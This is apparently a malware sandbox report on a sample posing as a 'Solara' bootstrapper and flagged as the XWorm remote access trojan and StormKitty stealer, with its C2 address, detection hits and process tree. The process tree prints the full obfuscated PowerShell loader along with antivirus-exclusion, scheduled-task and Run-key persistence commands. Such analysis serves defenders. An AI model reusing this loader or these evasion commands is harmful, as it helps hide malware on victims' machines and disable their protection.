stormkitty | e2f53b76060c0115efe12f3e6a8c2f0b27caed7a4d471b85d318b21de6cfe0c7

Analysis

max time kernel
142s
max time network
235s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
24/06/2024, 05:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SolaraB/SolaraBootstrapper.exe
Size

13KB
MD5

8be476fb431fcf11156417f410acf978
SHA1

55a19def82358ffc006487e1f49be04277e12bd5
SHA256

14cf7648123e018dcdfc2aa386135a0510a9f7b12b8bc125ad4e32fd7f16999c
SHA512

cf747947ff0bedf87230e0fa08ee534f44f08962a52ae3dd0c0d734d6f4131456a0e2dc1ac230fa6500d5b254a64cae9e01161d1a690e26794c38d66e22cb5ed
SSDEEP

192:IUxOQrGVa/nHU0LgJ2jaVb4+LHdrDXy3pifUJ1hHxrWjd:hIQaVafU0LmqaVb4+xPy5ifU1hRyj

Score

10^/10

stormkitty xworm execution persistence rat stealer themida trojan

Malware Config

Extracted

Family

xworm

anyone-blogging.gl.at.ply.gg:22284

Attributes

Install_directory
%Userprofile%
install_file
XClient.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2108-590-0x0000000007BE0000-0x0000000007BF4000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/2108-3565-0x0000000009BA0000-0x0000000009CC0000-memory.dmp	family_stormkitty

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4452	powershell.exe
5760	powershell.exe
2108	powershell.exe
4816	powershell.exe
5824	powershell.exe
5184	powershell.exe
3800	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	SolaraBootstrapper.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000700000001daaa-2933.dat	themida
behavioral2/memory/6464-2947-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3012-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3013-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3011-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3193-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3457-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3535-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3627-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida
behavioral2/memory/6464-3629-0x0000000180000000-0x0000000180A5B000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\XClient.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
12	raw.githubusercontent.com
354	raw.githubusercontent.com
357	raw.githubusercontent.com
496	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3776	2108	WerFault.exe	123

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4684	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2920	SolaraBootstrapper.exe
2920	SolaraBootstrapper.exe
2920	SolaraBootstrapper.exe
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe
5760	powershell.exe
5760	powershell.exe
5760	powershell.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
5824	powershell.exe
5824	powershell.exe
5824	powershell.exe
5184	powershell.exe
5184	powershell.exe
5184	powershell.exe
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2920	SolaraBootstrapper.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4612	firefox.exe
Token: SeDebugPrivilege	4612	firefox.exe
Token: SeDebugPrivilege	5760	powershell.exe
Token: SeIncreaseQuotaPrivilege	5760	powershell.exe
Token: SeSecurityPrivilege	5760	powershell.exe
Token: SeTakeOwnershipPrivilege	5760	powershell.exe
Token: SeLoadDriverPrivilege	5760	powershell.exe
Token: SeSystemProfilePrivilege	5760	powershell.exe
Token: SeSystemtimePrivilege	5760	powershell.exe
Token: SeProfSingleProcessPrivilege	5760	powershell.exe
Token: SeIncBasePriorityPrivilege	5760	powershell.exe
Token: SeCreatePagefilePrivilege	5760	powershell.exe
Token: SeBackupPrivilege	5760	powershell.exe
Token: SeRestorePrivilege	5760	powershell.exe
Token: SeShutdownPrivilege	5760	powershell.exe
Token: SeDebugPrivilege	5760	powershell.exe
Token: SeSystemEnvironmentPrivilege	5760	powershell.exe
Token: SeRemoteShutdownPrivilege	5760	powershell.exe
Token: SeUndockPrivilege	5760	powershell.exe
Token: SeManageVolumePrivilege	5760	powershell.exe
Token: 33	5760	powershell.exe
Token: 34	5760	powershell.exe
Token: 35	5760	powershell.exe
Token: 36	5760	powershell.exe
Token: SeIncreaseQuotaPrivilege	5760	powershell.exe
Token: SeSecurityPrivilege	5760	powershell.exe
Token: SeTakeOwnershipPrivilege	5760	powershell.exe
Token: SeLoadDriverPrivilege	5760	powershell.exe
Token: SeSystemProfilePrivilege	5760	powershell.exe
Token: SeSystemtimePrivilege	5760	powershell.exe
Token: SeProfSingleProcessPrivilege	5760	powershell.exe
Token: SeIncBasePriorityPrivilege	5760	powershell.exe
Token: SeCreatePagefilePrivilege	5760	powershell.exe
Token: SeBackupPrivilege	5760	powershell.exe
Token: SeRestorePrivilege	5760	powershell.exe
Token: SeShutdownPrivilege	5760	powershell.exe
Token: SeDebugPrivilege	5760	powershell.exe
Token: SeSystemEnvironmentPrivilege	5760	powershell.exe
Token: SeRemoteShutdownPrivilege	5760	powershell.exe
Token: SeUndockPrivilege	5760	powershell.exe
Token: SeManageVolumePrivilege	5760	powershell.exe
Token: 33	5760	powershell.exe
Token: 34	5760	powershell.exe
Token: 35	5760	powershell.exe
Token: 36	5760	powershell.exe
Token: SeIncreaseQuotaPrivilege	5760	powershell.exe
Token: SeSecurityPrivilege	5760	powershell.exe
Token: SeTakeOwnershipPrivilege	5760	powershell.exe
Token: SeLoadDriverPrivilege	5760	powershell.exe
Token: SeSystemProfilePrivilege	5760	powershell.exe
Token: SeSystemtimePrivilege	5760	powershell.exe
Token: SeProfSingleProcessPrivilege	5760	powershell.exe
Token: SeIncBasePriorityPrivilege	5760	powershell.exe
Token: SeCreatePagefilePrivilege	5760	powershell.exe
Token: SeBackupPrivilege	5760	powershell.exe
Token: SeRestorePrivilege	5760	powershell.exe
Token: SeShutdownPrivilege	5760	powershell.exe
Token: SeDebugPrivilege	5760	powershell.exe
Token: SeSystemEnvironmentPrivilege	5760	powershell.exe
Token: SeRemoteShutdownPrivilege	5760	powershell.exe
Token: SeUndockPrivilege	5760	powershell.exe
Token: SeManageVolumePrivilege	5760	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe
4612	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2920 wrote to memory of 1468	2920	SolaraBootstrapper.exe	100
PID 2920 wrote to memory of 1468	2920	SolaraBootstrapper.exe	100
PID 2920 wrote to memory of 1468	2920	SolaraBootstrapper.exe	100
PID 1468 wrote to memory of 4452	1468	cmd.exe	102
PID 1468 wrote to memory of 4452	1468	cmd.exe	102
PID 1468 wrote to memory of 4452	1468	cmd.exe	102
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 1180 wrote to memory of 4612	1180	firefox.exe	106
PID 4612 wrote to memory of 3248	4612	firefox.exe	107
PID 4612 wrote to memory of 3248	4612	firefox.exe	107
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108
PID 4612 wrote to memory of 3780	4612	firefox.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB\SolaraBootstrapper.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_469_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_469.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5760
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_469.vbs"
      4⤵
      Checks computer location settings
      PID:1496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_469.bat" "
        5⤵
        
        PID:5412
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Roaming\startup_str_469.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:2108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3800
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\XClient.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4684
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 3340
        7⤵
        Program crash
        
        PID:3776
- C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
  "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
  2⤵
  PID:6464
- - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=6464.7052.9511635907052121146
    3⤵
    PID:6580
  - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=122.0.2365.52 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdb24e2e98,0x7ffdb24e2ea4,0x7ffdb24e2eb0
      4⤵
      PID:6564
  - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1788 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:2
      4⤵
      PID:6244
  - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --mojo-platform-channel-handle=2104 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:3
      4⤵
      PID:6256
  - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:8
      4⤵
      PID:6436
  - - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=3676 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:1
      4⤵
      PID:1236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4612
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.0.76890781\209718544" -parentBuildID 20221007134813 -prefsHandle 1812 -prefMapHandle 1804 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8539d5f-bf0e-4597-bf7c-d082a9a6e20f} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 1904 1e7853f8b58 gpu
    3⤵
    PID:3248
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.1.521831789\1806776855" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {993fbfea-4096-4a36-ae1b-b92e5e6254a4} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 2344 1e7852f0a58 socket
    3⤵
    PID:3780
- - C:\Program Files\Mozilla Firefox\firefox.exe
